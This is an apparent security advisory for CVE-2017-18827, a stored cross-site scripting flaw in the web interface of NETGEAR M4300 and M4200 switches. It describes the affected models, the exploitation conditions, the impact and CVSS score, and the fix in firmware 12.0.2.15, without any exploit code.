CVE-2017-18827

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in the web management interface of multiple NETGEAR fully managed switch models. Affected models include M4300-28G, M4300-52G, M4300-28G-POE+, M4300-52G-POE+, M4300-8X8F, M4300-12X12F, M4300-24X24F, M4300-24X, M4300-48X, and M4200 running firmware versions prior to 12.0.2.15 [1]. The vulnerability allows an attacker to store malicious script code that is later executed in the context of an administrator's browser when viewing the affected page.

Exploitation

To exploit this vulnerability, an attacker must have authenticated access to the switch's web management interface with sufficient privileges to input data that is not properly sanitized. The attacker then injects a malicious script into a field that is stored and later rendered to other users, including administrators. Upon viewing the affected page, the injected script executes in the victim's browser, potentially allowing further actions within the security context of the web application [1].

Impact

Successful exploitation enables the attacker to execute arbitrary JavaScript in the context of the web interface of the affected switch. This can lead to session hijacking, defacement, or theft of sensitive information displayed in the management interface. The CVSS v3 score is 5.2 (Medium) with the vector AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L, indicating the attacker requires high privileges and user interaction, but the impact on confidentiality, integrity, and availability is limited [1].

Mitigation

The vulnerability is fixed in firmware version 12.0.2.15 for all affected M4300 and M4200 series models. NETGEAR strongly recommends upgrading to the latest firmware by downloading it from the NETGEAR Support website and following the installation instructions. No workarounds are provided other than applying the firmware update [1].